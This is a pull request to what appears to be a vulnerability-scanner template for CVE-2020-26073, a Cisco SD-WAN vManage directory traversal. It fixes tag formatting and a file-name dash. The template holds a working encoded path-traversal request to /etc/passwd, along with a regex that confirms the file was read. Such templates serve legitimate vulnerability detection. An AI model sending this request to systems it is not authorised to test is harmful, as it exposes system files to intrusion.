### PR TITLE
Fixed typo in CVE-2020-26073 & made it's file name consistent with the rest of the vulnerabilities.

### DIFF
--- a/cves/2020/CVE-2020-26073.yaml
+++ b/cves/2020/CVE-2020-26073.yaml
@@ -4,7 +4,7 @@ info:
   author: madrobot
   severity: high
   reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020–26073
-  tags: Directory Traversal
+  tags: cve,cve2020,cisco,lfi
 
 requests:
   - method: GET

--- a/cves/2020/CVE-2020-26073.yaml
+++ b/cves/2020/CVE-2020-26073.yaml
@@ -1,0 +1,21 @@
+id: CVE-2020–26073
+info:
+  name: Cisco SD-WAN vManage Software Directory Traversal
+  author: madrobot
+  severity: high
+  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020–26073
+  tags: Directory Traversal
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+        part: body


### PR DESCRIPTION
The file name had a "-" that was inconsistent with the hyphen in the other files. There was also a typo where the word "words" was used instead of "regex" under the matchers. 